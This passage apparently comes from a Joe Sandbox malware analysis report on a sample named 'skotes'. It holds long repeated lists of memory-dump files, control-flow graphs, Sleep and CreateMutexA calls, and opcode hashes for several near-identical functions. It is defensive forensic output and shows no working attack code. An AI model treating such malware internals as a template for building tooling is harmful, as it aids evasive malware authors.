                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: cf75e72e82d0923427039e01ab63743e1cb5b8f2cdce97ae07749fde2a652111
                                                                                                                                                                    • Instruction ID: 7475efb6c1bf89e709945d7dbef73b7284563df1b8824b6eb56fbe9d5bc2aadf
                                                                                                                                                                    • Opcode Fuzzy Hash: cf75e72e82d0923427039e01ab63743e1cb5b8f2cdce97ae07749fde2a652111
                                                                                                                                                                    • Instruction Fuzzy Hash: BC314A31A051408BEB08DB7CDC857EEB773DB82314F288658E064D73D6C7759AC087A2
                                                                                                                                                                    Function 00619F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 22 619f44-619f64 26 619f92-619fae 22->26 27 619f66-619f72 22->27 30 619fb0-619fbc 26->30 31 619fdc-619ffb 26->31 28 619f74-619f82 27->28 29 619f88-619f8f call 62d663 27->29 28->29 34 61a92b 28->34 29->26 36 619fd2-619fd9 call 62d663 30->36 37 619fbe-619fcc 30->37 32 61a029-61a916 call 6280c0 31->32 33 619ffd-61a009 31->33 38 61a00b-61a019 33->38 39 61a01f-61a026 call 62d663 33->39 41 61a953-61a994 Sleep CreateMutexA 34->41 42 61a92b call 646c6a 34->42 36->31 37->34 37->36 38->34 38->39 39->32 52 61a9a7-61a9a8 41->52 53 61a996-61a998 41->53 42->41 53->52 54 61a99a-61a9a5 53->54 54->52
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: 971797f2fb95fd6c240647523c59d1fb4113386334b64bf67e29c41a2bf08431
                                                                                                                                                                    • Instruction ID: 294f8577912ef65d6fd1355f9537b0faab5fff649fc432050b82895385e4c650
                                                                                                                                                                    • Opcode Fuzzy Hash: 971797f2fb95fd6c240647523c59d1fb4113386334b64bf67e29c41a2bf08431
                                                                                                                                                                    • Instruction Fuzzy Hash: DB316A316011009FEB089BBCDC857EDB763EB86314F288A59E064DB3D5C77599C18762
                                                                                                                                                                    Function 0061A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 56 61a079-61a099 60 61a0c7-61a0e3 56->60 61 61a09b-61a0a7 56->61 64 61a111-61a130 60->64 65 61a0e5-61a0f1 60->65 62 61a0a9-61a0b7 61->62 63 61a0bd-61a0c4 call 62d663 61->63 62->63 66 61a930-61a994 call 646c6a Sleep CreateMutexA 62->66 63->60 70 61a132-61a13e 64->70 71 61a15e-61a916 call 6280c0 64->71 68 61a0f3-61a101 65->68 69 61a107-61a10e call 62d663 65->69 86 61a9a7-61a9a8 66->86 87 61a996-61a998 66->87 68->66 68->69 69->64 76 61a140-61a14e 70->76 77 61a154-61a15b call 62d663 70->77 76->66 76->77 77->71 87->86 88 61a99a-61a9a5 87->88 88->86
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: b8ca188680f195e1d0166093b16d0effaaf85c8ce74c04fb20278abd7e2776a5
                                                                                                                                                                    • Instruction ID: c01c935139d5e0459592e4dd167e677a7317919e7fdb953c8ce50cc366626f19
                                                                                                                                                                    • Opcode Fuzzy Hash: b8ca188680f195e1d0166093b16d0effaaf85c8ce74c04fb20278abd7e2776a5
                                                                                                                                                                    • Instruction Fuzzy Hash: C1313731A111409BEB08DBBCDC857EDB7639B86314F288658E068D73D5C77599C08753
                                                                                                                                                                    Function 0061A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 90 61a1ae-61a1ce 94 61a1d0-61a1dc 90->94 95 61a1fc-61a218 90->95 96 61a1f2-61a1f9 call 62d663 94->96 97 61a1de-61a1ec 94->97 98 61a246-61a265 95->98 99 61a21a-61a226 95->99 96->95 97->96 102 61a935 97->102 100 61a293-61a916 call 6280c0 98->100 101 61a267-61a273 98->101 104 61a228-61a236 99->104 105 61a23c-61a243 call 62d663 99->105 106 61a275-61a283 101->106 107 61a289-61a290 call 62d663 101->107 109 61a953-61a994 Sleep CreateMutexA 102->109 110 61a935 call 646c6a 102->110 104->102 104->105 105->98 106->102 106->107 107->100 120 61a9a7-61a9a8 109->120 121 61a996-61a998 109->121 110->109 121->120 122 61a99a-61a9a5 121->122 122->120
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
